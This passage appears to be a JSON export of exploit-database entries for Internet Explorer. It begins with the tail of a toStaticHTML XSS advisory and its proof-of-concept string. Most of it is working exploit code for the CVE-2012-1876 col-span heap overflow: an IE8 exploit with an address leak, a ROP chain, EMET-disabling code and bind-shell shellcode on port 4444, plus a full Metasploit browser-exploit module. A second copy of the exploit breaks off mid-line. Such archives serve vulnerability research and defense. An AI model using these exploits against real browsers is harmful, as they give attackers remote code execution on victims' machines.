that will overcome * \ntoStaticHTML*'s security logic; therefore, after passing the specially \ncrafted CSS string through the *toStaticHTML* function, it will contain an \nexpression that triggers a JavaScript call. \n \nThe following JavaScript code demonstrates the vulnerability: \n \n*<script>document.write(toStaticHTML(\"<style> \ndiv{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{} \n</style><div>POC</div>\"))</script>* \n \nIn this case the function's return value would be JavaScript executable: \n \n*<style> \ndiv{font-family:rgb('0,0,0)''';}foo');color=expression(alert(1));{;}</style> \n<div>POC</div>* \n \n \n \nThe reason this code bypasses the filter engine is due to two reasons: \n \n1. The filtering engine allows the string \"expression(\" to exists in \n\"non-dangerous\" locations within the CSS. \n2. A bug in Internet Explorer's CSS parsing engine doesn't properly \nterminate strings that are opened inside brackets and closed outside of \nthem. \n \nWhen combining these two factors the attacker is able to \"confuse\" the \nfiltering mechanism into \"thinking\" that a string is open when in fact it \nis terminated and vice versa. With this ability the attacker can trick the \nfiltering mechanism into entering a state of the selector context which is \nconsidered safer where in fact the code is just a new declaration of the \nsame selector, thus breaking the state machine and bypassing the filter. \n \n \n \nImpact \n \nEvery application that relies on the *toStaticHTML* component to sanitize \nuser supplied data had probably been vulnerable to XSS. \n \n \n \nRemediation \n \nMicrosoft has issued several updates to address this vulnerability. \n \nMS12-037 - http://technet.microsoft.com/en-us/security/bulletin/ms12-037 \n \nMS12-039 - http://technet.microsoft.com/en-us/security/bulletin/ms12-039 \n \nMS12-050 - http://technet.microsoft.com/en-us/security/bulletin/MS12-050 \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/114615/tostatichtml-xss.txt"}, {"lastseen": "2016-12-05T22:21:07", "description": "", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "PACKETSTORM:127316", "href": "https://packetstormsecurity.com/files/127316/Internet-Explorer-8-Bypass.html", "sourceData": "` \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \nvar getprocaddr = cbuttonlayout + 4836; // GetProcAddress \nvar getprocaddr = getprocaddr.toString(16); \nvar getprocaddr1 = getprocaddr.substring(4,8); \nvar getprocaddr2 = getprocaddr.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u101C%u076d\"); // EMET string \nshellcode+= unescape(\"%ue220%u0007\"); // EMET offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \nshellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n \n// EMET disable part 0x02 \n// Execute the Corbomite bluff to disarm EAF \nshellcode+= unescape(\"%uc0b8%u6d10\"); \nshellcode+= unescape(\"%u8b07%u8b00\"); \nshellcode+= unescape(\"%u6800%u10c8\"); \nshellcode+= unescape(\"%u076d%ud0ff\"); \nshellcode+= unescape(\"%ud468%u6d10\"); \nshellcode+= unescape(\"%u5007%uc4b8\"); \nshellcode+= unescape(\"%u6d10%u8b07\"); \nshellcode+= unescape(\"%u8b00%uff00\"); \nshellcode+= unescape(\"%u8bd0%u81f0\"); \nshellcode+= unescape(\"%uccec%u0002\"); \nshellcode+= unescape(\"%uc700%u2404\"); \nshellcode+= unescape(\"%u0010%u0001\"); \nshellcode+= unescape(\"%ufc8b%uccb9\"); \nshellcode+= unescape(\"%u0002%u8300\"); \nshellcode+= unescape(\"%u04c7%ue983\"); \nshellcode+= unescape(\"%u3304%uf3c0\"); \nshellcode+= unescape(\"%u54aa%ufe6a\"); \nshellcode+= unescape(\"%ud6ff%u9090\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u29eb\"); // NOPs \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress \nshellcode+= \"NTDLL\"; \nshellcode+= unescape(\"%u0000\"); \nshellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread \nshellcode+= unescape(\"%u4374%u6e6f\"); \nshellcode+= unescape(\"%u6574%u7478\"); \nshellcode+= unescape(\"%u6854%u6572\"); \nshellcode+= unescape(\"%u6461%u0000\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile (padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127316/iecolspan-bypass.txt"}, {"lastseen": "2016-12-05T22:16:44", "description": "", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2012-08-01T00:00:00", "id": "PACKETSTORM:115155", "href": "https://packetstormsecurity.com/files/115155/Microsoft-Internet-Explorer-Fixed-Table-Col-Span-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:rank => NormalRanking, # reliable memory corruption \n:javascript => true \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow', \n'Description' => %q{ \nThis module exploits a heap overflow vulnerability in Internet Explorer caused \nby an incorrect handling of the span attribute for col elements from a fixed table, \nwhen they are modified dynamically by javascript code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alexandre Pelletier', # Vulnerability analysis \n'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module \n'binjo', # Metasploit module \n'sinn3r', # Help with the Metasploit module \n'juan' # Help with the Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-1876' ], \n[ 'OSVDB', '82866'], \n[ 'BID', '53848' ], \n[ 'MSB', 'MS12-037' ], \n[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3 with msvcrt ROP', \n{ \n'Rop' => :msvcrt \n} \n], \n[ 'IE 8 on Windows 7 SP1', \n{ \n'Rop' => :jre \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 12 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/ \nreturn targets[1] #IE 8 on Windows XP SP3 \nelsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/ \nreturn targets[2] #IE 8 on Windows 7 with JRE \nelse \nreturn nil \nend \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef get_payload(t) \n \ncode = payload.encoded \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nexec_size = code.length \nrop = \n[ \n0x77c4ec01, # retn \n0x77c4ec00, # pop ebp; retn \n0x77c15ed5, # xchg eax,esp; retn (pivot) \n0x77c4e392, # pop eax; retn \n0x77c11120, # <- *&VirtualProtect() \n0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn \njunk, \n0x77c2dd6c, \n0x77c4ec00, # pop ebp; retn \n0x77c35459, # ptr to 'push esp; ret' \n0x77c47705, # pop ebx; retn \nexec_size, # ebx \n0x77c3ea01, # pop ecx; retn \n0x77c5d000, # W pointer (lpOldProtect) (-> ecx) \n0x77c46100, # pop edi; retn \n0x77c46101, # rop nop (-> edi) \n0x77c4d680, # pop edx; retn \n0x00000040, # newProtect (0x40) (-> edx) \n0x77c4e392, # pop eax; retn \nnop, # nops (-> eax) \n0x77c12df9 # pushad; retn \n].pack(\"V*\") \nwhen :jre \nprint_status(\"Using JRE ROP\") \nexec_size = code.length \nrop = \n[ \n0x7c346c0b, # retn \n0x7c36f970, # pop ebp; retn \n0x7c348b05, # xchg eax,esp; retn (pivot) \n0x7c36f970, # pop ebp; retn [MSVCR71.dll] \n0x7c36f970, # skip 4 bytes [MSVCR71.dll] \n0x7c34373a, # pop ebx ; retn [MSVCR71.dll] \nexec_size, # ebx \n0x7c3444d0, # pop edx ; retn [MSVCR71.dll] \n0x00000040, # 0x00000040-> edx \n0x7c361829, # pop ecx ; retn [MSVCR71.dll] \n0x7c38f036, # &Writable location [MSVCR71.dll] \n0x7c342766, # pop edi ; retn [MSVCR71.dll] \n0x7c346c0b, # retn (rop nop) [MSVCR71.dll] \n0x7c350564, # pop esi ; retn [MSVCR71.dll] \n0x7c3415a2, # jmp [eax] [MSVCR71.dll] \n0x7c3766ff, # pop eax ; retn [MSVCR71.dll] \n0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll] \n0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll] \n0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll] \n].pack(\"V*\") \nend \n \ncode = rop + code \nreturn code \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"Browser not supported: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \njs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch)) \n \ntable_builder = '' \n \n0.upto(132) do |i| \ntable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >&nbsp </col></table>\" \nend \n \n# About smash_vtable(): \n# * smash the vftable 0x07070024 \n# * span => the amount to overwrite \njs_element_id = Rex::Text.rand_text_alpha(4) \nspray_trigger_js = <<-JS \n \nvar dap = \"EEEE\"; \nwhile ( dap.length < 480 ) dap += dap; \n \nvar padding = \"AAAA\"; \nwhile ( padding.length < 480 ) padding += padding; \n \nvar filler = \"BBBB\"; \nwhile ( filler.length < 480 ) filler += filler; \n \nvar arr = new Array(); \nvar rra = new Array(); \n \nvar div_container = document.getElementById(\"#{js_element_id}\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nrra[i] = dap.substring(0, (0x100-6)/2); \narr[i] = padding.substring(0, (0x100-6)/2); \narr[i+1] = filler.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nrra[i] = null; \nCollectGarbage(); \n} \n \nfunction heap_spray(){ \nCollectGarbage(); \n \nvar shellcode = unescape(\"#{js_code}\"); \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \nvar onemeg = shellcode.substr(0, 64*1024/2); \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \nvar spray = new Array(); \n \nfor (i=0; i<400; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction smash_vtable(){ \nvar obj_col_0 = document.getElementById(\"132\"); \nobj_col_0.width = \"1178993\"; \nobj_col_0.span = \"44\"; \n} \n \nsetTimeout(function(){heap_spray()}, 400); \nsetTimeout(function(){smash_vtable()}, 700); \nJS \n \nif datastore['OBFUSCATE'] \nspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js) \nspray_trigger_js.obfuscate \nend \n \n# build html \ncontent = <<-HTML \n<html> \n<body> \n<div id=\"#{js_element_id}\"></div> \n#{table_builder} \n<script language='javascript'> \n#{spray_trigger_js} \n</script> \n</body> \n</html> \nHTML \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115155/ms12_037_ie_colspan.rb.txt"}, {"lastseen": "2016-12-05T22:14:47", "description": "", "cvss3": {}, "published": "2013-01-11T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2013-01-11T00:00:00", "id": "PACKETSTORM:119467", "href": "https://packetstormsecurity.com/files/119467/Internet-Explorer-8-Heap-Overflow.html", "sourceData": "` \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= 